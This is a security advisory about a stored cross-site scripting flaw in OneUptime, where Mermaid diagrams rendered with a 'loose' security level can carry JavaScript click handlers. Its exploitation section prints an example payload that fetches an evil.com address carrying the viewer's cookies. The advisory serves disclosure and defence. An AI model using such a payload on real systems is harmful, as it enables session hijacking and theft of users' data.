OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: "loose")

Vulnerability

Overview

OneUptime, an open-source monitoring and observability platform, contains a stored cross-site scripting (XSS) vulnerability in its Markdown viewer component. The issue arises because the Mermaid diagram renderer is initialized with securityLevel: "loose" and the resulting SVG is injected into the DOM via innerHTML [1][3]. This configuration explicitly permits interactive event bindings, contrary to the safe default "strict" which strips all interactivity.

Exploitation

Details

An authenticated attacker can exploit this by crafting a Mermaid diagram that uses the click directive to execute arbitrary JavaScript. For example, a payload like click A callback "javascript:fetch('https://evil.com/?c='+document.cookie)" will be processed by Mermaid and embedded as an event handler in the SVG [3]. Any field that renders Markdown—such as incident descriptions, status page announcements, or monitor notes—is a potential attack vector. The attacker only needs the ability to create or edit content that is later displayed to other users.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of any user who views the malicious diagram. This can lead to session hijacking, data exfiltration, or further compromise of the OneUptime instance. Since the XSS is stored, it affects all subsequent viewers, including administrators, amplifying the potential damage.

Mitigation

The vulnerability is fixed in OneUptime version 10.0.23 [4]. Users should upgrade immediately. The fix likely involves setting securityLevel to "strict" and avoiding raw innerHTML injection. No workarounds are documented, but restricting Markdown input to trusted users may reduce risk until patching is complete.